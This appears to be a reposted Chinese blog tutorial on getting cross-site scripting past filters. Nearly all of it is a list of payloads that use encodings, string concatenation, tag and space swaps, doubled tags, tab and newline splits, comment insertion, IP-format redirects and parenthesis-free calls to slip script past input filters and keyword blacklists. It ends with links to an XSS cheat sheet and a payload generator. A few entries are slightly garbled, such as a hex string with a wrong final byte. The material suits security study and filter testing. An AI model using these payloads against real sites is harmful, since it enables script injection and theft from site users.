基础8.1-XSS绕过小技巧

Delina

原文链接：基础8.1-XSS绕过小技巧
xss绕过小技巧

1.1 编码绕过

1. url编码：javascript%3Aalert%281%29
   
2. Hex编码:%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%35
   
3. javascript编码：<img src=x onerror="javascript:alert('XSS')">
   
4. US-ASCII编码:¼script¾alert(¢XSS¢)¼/script¾
   
5. Unicode编码、Base64编码、JS8编码、JS16编码、Ascii编码等等

复制代码

1.2 利用字符串拼接(top、this、self、parent、frames、content、window等)

1. <details open ontoggle=top.alert(1)>
   
2. <script>top["al"+"ert"](`xss`);</script>
   
3. <img src="x" onerror="a=aler;b=t;c='(xss);';eval(a+b+c)">
   
4. <img/src=1 onerror=window.alert(1)>
   
5. <svg onload="a(this);function a(){}(alert`1`)">

复制代码

1.3 标签语法替换

1. <img/src="x"/onerror=alert("xss");>（/替换空格）
   
2. <keygen autofocus onfocus=alert(1)> //仅限火狐
   
3. <isindex type=image src=1 onerror=alert("xss")>//仅限于IE
   
4. <link rel=import href="http://127.0.0.1/1.js">（在无CSP的情况下才可以）

复制代码

1.4 单次过滤

1. <imimgg srsrcc=x onerror=alert("xss");>
   
2. <scri<script>pt>alert("hello world!")</scri</script>pt>

复制代码

1.5 拆解绕过

[backcolor=rgba(0, 0, 0, 0.03)]

1. <img src="jav   ascript:alert('XSS');">
   
2. TAB编码:<img src="jav        ascript:alert('XSS');">
   
3. 换行符拆解:<img src="jav
   
4. ascript:alert('XSS');">
   
5. 回车拆解:<img src="jav
   
6. ascript:alert('XSS');">
   
7. 等

复制代码

1.6 添加混淆

1. 注析干扰：<scri<!--test-->pt>alert("hello world!")</scri<!--test-->pt>
   
2. <SCRIPT>var a="\";alert("xss");//";</SCRIPT>
   
3. <<script>alert("xss");//<</script>
   
4. 标签优先级：<title><img src=</title>><img src=x onerror="alert(`xss`);">

复制代码

1.7 使用IP

1. 十进制：<img src="x" onerror=document.location=`http://2130706433/`>
   
2. 八进制：<img src="x" onerror=document.location=`http://0177.0.0.01/`>
   
3. 十六进制：<img src="x" onerror=document.location=``http://0x7f.0x0.0x0.0x1/``>

复制代码

1.8 括号过滤

1. <svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
   
2. <img/src=1 onerror="top.onerror=alert; throw 1">
   
3. <img src=x onerror=alert`1`>
   
4. <img src=1 onerror=alert%28%29>
   
5. <img src=1 onerror=location="javascript:"+"aler"+"t%281%29">

复制代码

1.9 黑名单绕过(以alert(1)为例)

1. (alert)(1)
   
2. a=alert,a(1)
   
3. [1].find(alert)
   
4. top["al"+"ert"](1)
   
5. self[/al/.source+/ert/.source](1)
   
6. al\u0065rt(1)
   
7. frames['al\145rt'](1)
   
8. content[8680439..toString(30)](1)

复制代码

2.赋值

1. # 变量
   
2. <img/src=1 onerror=_=alert,_(1)>
   
3. <style onload=_=alert;_(1)>
   
4. <details/open/ontoggle=_=alert;x=1;_`1`>
   
5. <details open ontoggle=top[a='al',b='ev',b%2ba](prompt(1))>
   
6. <details open ontoggle=top[a='al',b='ev',b%2ba]('\141\154\145\162\164\50\61\51')>
   
7. <details open ontoggle=top[a='meout',b='setTi',b%2ba]('\141\154\145\162\164\50\61\51')>
   
8. # 函数
   
9. <img/src=1 onmouseover="a=alert,a`1`">
   
10. # 属性
    
11. <img src=1 alt=al lang=ert onerror=top[alt%2blang](1)>

复制代码

xss备忘单：https://portswigger.net/web-secu ... cripting/cheat-shee

• 
  

xsspayload在线生成器：http://xssfuzzer.com/fuzzer.html